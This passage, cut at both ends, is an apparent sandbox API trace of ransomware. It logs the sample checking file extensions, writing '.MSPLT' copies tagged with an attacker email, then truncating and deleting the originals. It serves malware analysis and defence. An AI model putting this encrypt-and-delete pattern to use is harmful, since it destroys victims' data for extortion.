(lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0167.201] GetLastError () returned 0x0 [0167.201] ReadFile (in: hFile=0x2d0, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x28, lpOverlapped=0x0) returned 1 [0167.218] WriteFile (in: hFile=0x2c8, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x30, lpOverlapped=0x0) returned 1 [0167.219] ReadFile (in: hFile=0x2d0, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0167.219] WriteFile (in: hFile=0x2c8, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x110, lpOverlapped=0x0) returned 1 [0167.219] SetEndOfFile (hFile=0x2c8) returned 1 [0167.220] CloseHandle (hObject=0x2c8) returned 1 [0167.221] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0167.221] SetEndOfFile (hFile=0x2d0) returned 1 [0167.222] CloseHandle (hObject=0x2d0) returned 1 [0167.223] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0167.223] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 1 [0167.223] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.223] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.223] lstrlenW (lpString=".doc") returned 4 [0167.223] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0167.224] lstrlenW (lpString=".docx") returned 5 [0167.224] lstrcmpiW (lpString1=".docx", lpString2="t.log") returned -1 [0167.224] lstrlenW (lpString=".pdf") returned 4 [0167.224] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0167.224] lstrlenW (lpString=".xls") returned 4 [0167.224] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0167.224] lstrlenW (lpString=".xlsx") returned 5 [0167.224] lstrcmpiW (lpString1=".xlsx", lpString2="t.log") returned -1 [0167.224] lstrlenW (lpString=".ppt") returned 4 [0167.224] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0167.224] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.224] lstrlenW (lpString=".zip") returned 4 [0167.224] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0167.224] lstrlenW (lpString=".rar") returned 4 [0167.224] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0167.224] lstrlenW (lpString=".bz2") returned 4 [0167.224] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0167.224] lstrlenW (lpString=".7z") returned 3 [0167.224] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0167.224] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.224] lstrlenW (lpString=".dbf") returned 4 [0167.224] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0167.224] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.224] lstrlenW (lpString=".1cd") returned 4 [0167.224] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0167.224] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.224] lstrlenW (lpString=".jpg") returned 4 [0167.224] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0167.225] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.225] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.225] lstrlenW (lpString=".doc") returned 4 [0167.225] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0167.225] lstrlenW (lpString=".docx") returned 5 [0167.225] lstrcmpiW (lpString1=".docx", lpString2="t.log") returned -1 [0167.225] lstrlenW (lpString=".pdf") returned 4 [0167.225] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0167.225] lstrlenW (lpString=".xls") returned 4 [0167.225] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0167.225] lstrlenW (lpString=".xlsx") returned 5 [0167.225] lstrcmpiW (lpString1=".xlsx", lpString2="t.log") returned -1 [0167.225] lstrlenW (lpString=".ppt") returned 4 [0167.225] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0167.225] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.225] lstrlenW (lpString=".zip") returned 4 [0167.225] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0167.225] lstrlenW (lpString=".rar") returned 4 [0167.225] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0167.225] lstrlenW (lpString=".bz2") returned 4 [0167.225] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0167.225] lstrlenW (lpString=".7z") returned 3 [0167.225] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0167.225] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.225] lstrlenW (lpString=".dbf") returned 4 [0167.225] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0167.226] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.226] lstrlenW (lpString=".1cd") returned 4 [0167.226] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0167.226] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0167.226] lstrlenW (lpString=".jpg") returned 4 [0167.226] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0167.226] lstrcmpiW (lpString1=".ini", lpString2=".MSPLT") returned -1 [0167.226] lstrlenW (lpString="desktop.ini") returned 11 [0167.226] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0167.227] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=129) returned 1 [0167.227] CloseHandle (hObject=0x2d0) returned 1 [0167.227] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 0x26 [0167.227] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0167.228] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0167.228] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0167.228] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0167.228] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0167.232] GetLastError () returned 0x0 [0167.232] ReadFile (in: hFile=0x2d0, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x81, lpOverlapped=0x0) returned 1 [0167.233] WriteFile (in: hFile=0x2c8, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x90, lpOverlapped=0x0) returned 1 [0167.235] ReadFile (in: hFile=0x2d0, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0167.235] WriteFile (in: hFile=0x2c8, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xea, lpOverlapped=0x0) returned 1 [0167.235] SetEndOfFile (hFile=0x2c8) returned 1 [0167.235] CloseHandle (hObject=0x2c8) returned 1 [0167.236] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0167.236] SetEndOfFile (hFile=0x2d0) returned 1 [0167.237] CloseHandle (hObject=0x2d0) returned 1 [0167.237] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x26) returned 1 [0167.238] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 1 [0167.238] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.238] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.238] lstrlenW (lpString=".doc") returned 4 [0167.238] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.238] lstrlenW (lpString=".docx") returned 5 [0167.238] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0167.238] lstrlenW (lpString=".pdf") returned 4 [0167.238] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0167.238] lstrlenW (lpString=".xls") returned 4 [0167.238] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0167.238] lstrlenW (lpString=".xlsx") returned 5 [0167.238] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0167.238] lstrlenW (lpString=".ppt") returned 4 [0167.238] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0167.238] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.239] lstrlenW (lpString=".zip") returned 4 [0167.239] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0167.239] lstrlenW (lpString=".rar") returned 4 [0167.239] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0167.239] lstrlenW (lpString=".bz2") returned 4 [0167.239] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.239] lstrlenW (lpString=".7z") returned 3 [0167.239] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.239] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.239] lstrlenW (lpString=".dbf") returned 4 [0167.239] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.239] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.239] lstrlenW (lpString=".1cd") returned 4 [0167.239] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.239] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.239] lstrlenW (lpString=".jpg") returned 4 [0167.239] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0167.239] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.239] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.239] lstrlenW (lpString=".doc") returned 4 [0167.239] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.239] lstrlenW (lpString=".docx") returned 5 [0167.239] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0167.239] lstrlenW (lpString=".pdf") returned 4 [0167.239] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0167.239] lstrlenW (lpString=".xls") returned 4 [0167.240] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0167.240] lstrlenW (lpString=".xlsx") returned 5 [0167.240] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0167.240] lstrlenW (lpString=".ppt") returned 4 [0167.240] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0167.240] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.240] lstrlenW (lpString=".zip") returned 4 [0167.240] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0167.240] lstrlenW (lpString=".rar") returned 4 [0167.240] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0167.240] lstrlenW (lpString=".bz2") returned 4 [0167.240] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.240] lstrlenW (lpString=".7z") returned 3 [0167.240] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.240] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.240] lstrlenW (lpString=".dbf") returned 4 [0167.240] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.240] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.240] lstrlenW (lpString=".1cd") returned 4 [0167.240] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.240] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.240] lstrlenW (lpString=".jpg") returned 4 [0167.240] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0167.240] Sleep (dwMilliseconds=0x64) [0167.654] Sleep (dwMilliseconds=0x64) [0167.910] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0167.910] lstrlenW (lpString="eula.rtf") returned 8 [0167.910] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0167.914] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=7567) returned 1 [0167.914] CloseHandle (hObject=0x2e8) returned 1 [0167.914] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 0x80 [0167.914] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0167.914] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0167.915] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0167.915] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0167.915] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0167.917] GetLastError () returned 0x0 [0167.917] ReadFile (in: hFile=0x2e8, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x1d8f, lpOverlapped=0x0) returned 1 [0168.584] WriteFile (in: hFile=0x2ec, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x1d90, lpOverlapped=0x0) returned 1 [0168.586] ReadFile (in: hFile=0x2e8, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0168.586] WriteFile (in: hFile=0x2ec, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe4, lpOverlapped=0x0) returned 1 [0168.586] SetEndOfFile (hFile=0x2ec) returned 1 [0168.587] CloseHandle (hObject=0x2ec) returned 1 [0168.588] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0168.588] SetEndOfFile (hFile=0x2e8) returned 1 [0168.589] CloseHandle (hObject=0x2e8) returned 1 [0168.589] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0168.590] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 1 [0168.590] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.590] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.590] lstrlenW (lpString=".doc") returned 4 [0168.590] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.590] lstrlenW (lpString=".docx") returned 5 [0168.590] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.590] lstrlenW (lpString=".pdf") returned 4 [0168.590] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0168.590] lstrlenW (lpString=".xls") returned 4 [0168.590] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0168.590] lstrlenW (lpString=".xlsx") returned 5 [0168.591] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0168.591] lstrlenW (lpString=".ppt") returned 4 [0168.591] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0168.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.591] lstrlenW (lpString=".zip") returned 4 [0168.591] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0168.591] lstrlenW (lpString=".rar") returned 4 [0168.591] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0168.591] lstrlenW (lpString=".bz2") returned 4 [0168.591] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.591] lstrlenW (lpString=".7z") returned 3 [0168.591] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.591] lstrlenW (lpString=".dbf") returned 4 [0168.591] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.591] lstrlenW (lpString=".1cd") returned 4 [0168.591] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.591] lstrlenW (lpString=".jpg") returned 4 [0168.591] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0168.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.591] lstrlenW (lpString=".doc") returned 4 [0168.591] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.591] lstrlenW (lpString=".docx") returned 5 [0168.591] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.591] lstrlenW (lpString=".pdf") returned 4 [0168.591] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0168.592] lstrlenW (lpString=".xls") returned 4 [0168.592] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0168.592] lstrlenW (lpString=".xlsx") returned 5 [0168.592] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0168.592] lstrlenW (lpString=".ppt") returned 4 [0168.592] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0168.592] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.592] lstrlenW (lpString=".zip") returned 4 [0168.592] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0168.592] lstrlenW (lpString=".rar") returned 4 [0168.592] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0168.592] lstrlenW (lpString=".bz2") returned 4 [0168.592] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.592] lstrlenW (lpString=".7z") returned 3 [0168.592] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.592] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.592] lstrlenW (lpString=".dbf") returned 4 [0168.592] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.592] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.592] lstrlenW (lpString=".1cd") returned 4 [0168.592] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.592] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0168.592] lstrlenW (lpString=".jpg") returned 4 [0168.592] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0168.592] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0168.592] lstrlenW (lpString="LocalizedData.xml") returned 17 [0168.592] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0168.594] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=74214) returned 1 [0168.594] CloseHandle (hObject=0x2e8) returned 1 [0168.597] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 0x80 [0168.597] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.597] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0168.597] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0168.597] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0168.597] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0168.600] GetLastError () returned 0x0 [0168.600] ReadFile (in: hFile=0x2e8, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x121e6, lpOverlapped=0x0) returned 1 [0168.605] WriteFile (in: hFile=0x2ec, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x121f0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x121f0, lpOverlapped=0x0) returned 1 [0168.607] ReadFile (in: hFile=0x2e8, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0168.607] WriteFile (in: hFile=0x2ec, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf6, lpOverlapped=0x0) returned 1 [0168.607] SetEndOfFile (hFile=0x2ec) returned 1 [0168.608] CloseHandle (hObject=0x2ec) returned 1 [0168.612] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0168.612] SetEndOfFile (hFile=0x2e8) returned 1 [0168.614] CloseHandle (hObject=0x2e8) returned 1 [0168.614] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0168.614] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 1 [0168.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 